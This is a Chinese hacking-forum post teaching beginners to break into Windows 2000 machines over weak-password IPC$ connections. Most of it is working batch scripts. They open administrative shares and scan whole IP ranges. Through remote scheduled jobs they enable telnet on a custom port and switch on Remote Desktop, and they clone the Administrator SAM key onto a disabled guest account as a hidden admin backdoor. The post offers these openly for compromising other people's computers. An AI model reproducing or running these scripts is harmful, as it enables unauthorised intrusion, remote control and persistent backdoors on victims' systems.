论坛: 菜鸟乐园 标题: IPC入侵技巧 复制本贴地址    
作者: txhak [txhak]    论坛用户   登录

                          铁血

    关于IPC入侵讲解的文章非常多,我这里只是把一般文章中没有提到的几点
对新手来说比较棘手的问题给提示一下,具体问题还得具体分析。
 
  1,admin$共享
    在扫描到若口令的肉鸡后,ipc$连接也成功了,可是当你给肉鸡复制文件的
时候,或者用一些需要admin$共享的工具的时候。如果肉鸡的admin$共享没有打开,
怎么办?
    那还不好办。我们给他打开admin$共享不就行啦!呵呵!
    at \\xxx.xxx.xxx.xxx 20:20 net share admin$
    注意,把net share admin$直接在at命令下执行就可以打开共享啦,当然,你还可以用
    at \\xxx.xxx.xxx.xxx 20:20 net share C$=C:\等打开C盘等其他管理共享。


  2,ipc自动入侵批处理
    在写ipc自动入侵批处理的时候,新手最感到头痛的是就是怎样把肉鸡启动at命令的
时间在批处理中表示出来。还有就是怎样处理IP地址段,我曾经看见过一位老兄用了
4*255个set命令来设置ip地址,呵呵......
  (1)对肉鸡计划任务时间的表示
        我们知道net time \\xxx.xxx.xxx.xxx 就可以得到肉鸡的系统时间
        而net time \\xxx.xxx.xxx.xxx /set /y 则可以把肉鸡的系统时间同步到本机
        呵呵......也就是说这句命令就可以使你的机子的时间和肉鸡的一摸一样,那么你的时间也就是
        肉鸡的时间啦!嗯!说到这我想很多人也都明白啦。%time%就可以取得你本机的时间我们只要使%time%的时间
        加上一分钟,再把这个时间设成肉鸡启动计划任务的时间不就可以了吗?具体如下:
        net time \\xxx.xxx.xxx.xxx /set /y & IF errorlevel 1 goto :Error   
        for /f "tokens=1,2 delims=:"  %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j     
        set /a mm=%mm%+1 
        set tm=%hh%:%mm% 
这样%tm%就是处理好了的时间啦!当然这个%tm%可能超过60分或者超过24小时,所有还得处理一下
        if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1   
        if /i %hh% geq 24 set /a hh=0   
        set tm=%hh%:%mm%
这样就好拉!不过可能%mm%小于10的话,时间表示成01,02,03这样的形式,而以0开头的认为是8进制,08,09就超出8进制范围,会出错。如果觉得必要,还可以再处理一下,呵呵。这个我就懒得写啦,自己想想吧。


  (2)对IP地址段的处理
这是我先前写的一个中的几句关键的话,可以参考一下。
set ip1=0
set ip2=0
set ip3=0
set ip4=0
for /f "tokens=1-4 delims=."  %%i in ("%1") do set /a ip1=%%i & set /a ip2=%%j & set /a ip3=%%k & set /a ip4=%%l
if "%2"=="" (set ip5=255.255.255.255)  else set ip5=%2
goto start
:if4
if "%ip4%"=="255" goto if3
set /a ip4+=1
:start
SET ADDRESS=%ip1%.%ip2%.%ip3%.%ip4%
if "%ADDRESS%"=="%ip5%" goto ok
ping %ADDRESS% -n 1|find "Received = 1" 
if  errorlevel 1  ECHO 目标%ADDRESS%不存在或者对方有防火墙......  & goto if4
echo 正在测试%ADDRESS%........................
start /min  scan.bat %ADDRESS%
goto if4
:if3
if "%ip3%"=="255" goto if2
set /a ip3+=1
set ip4=0
goto start
:if2
if "%ip2%"=="255" goto if1
set /a ip2+=1
set ip4=0
set ip3=0
goto start
:if1
if "%ip1%"=="255" goto exit
set /a ip1+=1
set ip4=0
set ip3=0
set ip2=0
goto start
:exit


3,开启肉鸡的telnet服务
    在开启肉鸡telnet服务的时候,很多新手都希望用如下的形式来开启,这种不是不好,而是完全不行。
当然,在本机绝对是没有问题的,^_^
echo 5 > c:\telnet.txt
echo 3 >> c:\telnet.txt
echo 7 >> c:\telnet.txt
echo y >> c:\telnet.txt
echo 0 >> c:\telnet.txt
echo y >> c:\telnet.txt
echo 8 >> c:\telnet.txt
echo y >> c:\telnet.txt
echo %1 >> c:\telnet.txt
echo y >> c:\telnet.txt
echo 0 >> c:\telnet.txt
echo 4 >> c:\telnet.txt
echo 0 >> c:\telnet.txt
tlntadmn.exe < c:\telnet.txt
del c:\telnet.txt /f
这是因为ipc连接后,我们拥有的是system权限,而tlntadmn这个东西很古怪,只要administrators组的才可以。
所有tlntadmn根本就不会执行。但是再本机由于我们是administrators组的,所有当然可以很好实现。
不过我们可以直接修改注册表来实现,这样或许更好一些。%1,%2,%3分别为ip地址,用户名和密码。
@echo off 
echo 正在连接%1...   
echo.   
net use \\%1\ipc$ %3 /user:%2 & IF errorlevel 1 goto :Error   
echo 正在查询%1的当前时间   
echo.   
net time \\%1 /set /y & IF errorlevel 1 goto :Error   
for /f "tokens=1,2 delims=:"  %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j   
echo %1当前时间为%hh%:%mm%   
set /a mm=%mm%+1   
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1   
if /i %hh% geq 24 set /a hh=0   
set tm=%hh%:%mm%   
echo.   
echo 设置启动telnet的时间为%tm%   
echo.   
at \\%1 %tm% net stop telnet  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo Windows Registry Editor Version 5.00 ^>telnet.reg  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] ^>^> telnet.reg  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo """NTLM"""=dword:00000001  ^>^>telnet.reg  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo """TelnetPort"""=dword:0000206C    ^>^>telnet.reg  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tlntsvr]  ^>^>telnet.reg & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo """Type"""=dword:00000010  ^>^>telnet.reg  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo  """Start"""=dword:00000002  ^>^>telnet.reg & IF errorlevel 1 goto :Error   
echo.   
set /a mm=%mm%+1   
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1   
if /i %hh% geq 24 set /a hh=0   
set tm=%hh%:%mm%   
at \\%1 %tm%  regedit /s telnet.reg  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm% cmd /c echo  cls ^^^& echo ***************************铁血Telnet系统欢迎你*******************************  ^> %%cd%%\login.cmd  & IF errorlevel 1 goto :Error   
echo.   
at \\%1 %tm%  net start telnet  & IF errorlevel 1 goto :Error   
echo.   
echo 最多再过120秒,telnet服务就会被启动,请稍侯...   
goto :BYE   
:Error   
echo.   
net use \\%1\ipc$ /del /y   
echo %1出现错误,命令不能成功完成!   
echo.   
goto :exit   
:BYE   
echo.   
net use \\%1\ipc$ /del /y   
echo %1成功完成所有命令   
echo.   
:exit   
echo ------------------------------------------------------   
exit 

4,开启3389
其实开启3389就是方法很多,你要可以在批处理中加入脚本来运行,不过这不在我们讨论范围内啦
开3389就是一个命令
at \\%1 %tm% cmd /c echo [Components] ^> syslog  & IF errorlevel 1 goto :Error   
at \\%1 %tm% cmd /c echo TSEnable = on ^>^> syslog  & IF errorlevel 1 goto :Error     
at \\%1 %tm% sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\winnt\system32\syslog /q  & IF errorlevel 1 goto :Error   

5,克隆用户
  这里只说怎么克隆禁用的guest为管理员
  克隆用户,最不好做的就是怎样用批处理把administrator的”F“键复制给guest用户啦,原理大家在网上搜一搜
  吧,很多介绍的喔!这里就不说啦。
  (1)我们前面讲过,ipc连接后就拥有system权限,而system权限就可以直接操作sam注册表啦。很多克隆用户
的方法还有利用其他工具来得到system权限,这里不是现成的吗?^_^
  (2)在win2000中,administrator用户和guest用户注册表键名是固定的,SID固定。
      administrator的位置:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
      guest的位置:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
  (3).reg文件导入的时候有这样一个特性,就是如果在一个主键下有同名的键值,后面的会覆盖前面的
      比如咱们txhak.reg下有“F“,”V“,”V“这样三个键,但是有两个”V“键,后面”V“键的内容
      就会覆盖前面”V“键的内容。
  (4)克隆用户就是把administrator用户的键值”F“给guest用户,那么guest用户就会拥有administrator一样的权限,桌面都一样
      有了前面3点,我们也就能知道怎么实现克隆帐户啦
        @echo off 
        net user guest txhak   
        net user guest /active:no   
        echo Windows Registry Editor Version 5.00    >txhak.reg                                 
        echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]    >>txhak.reg   
        regedit /e Y1f4.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4   
        regedit /e Y1f5.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5   
        more +3 <Y1f4.reg      >>txhak.reg   
        more +7 <Y1f5.reg      >>txhak.reg   
        regedit /s txhak.reg   
        del /q Y1f4.reg   
        del /q Y1f5.reg   
        del /q txhak.reg   
        del /q ca.bat   
        exit 
  more命令的用法大家可以看看windows自带的帮助,在cmd下more /?就可以啦。

5,其他
  这里就只说这么几点啦,其他的请大家搜索一下。很多都有介绍的。注意这些都是在win2000下的,其他的可能有些差别。



[此贴被 txhak(txhak) 在 10月09日17时42分 编辑过]

地主 发表时间: 10/09 11:41
回复: sky2003 [sky2003]   论坛用户   登录
不错不错


B1层 发表时间: 10/09 17:38

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号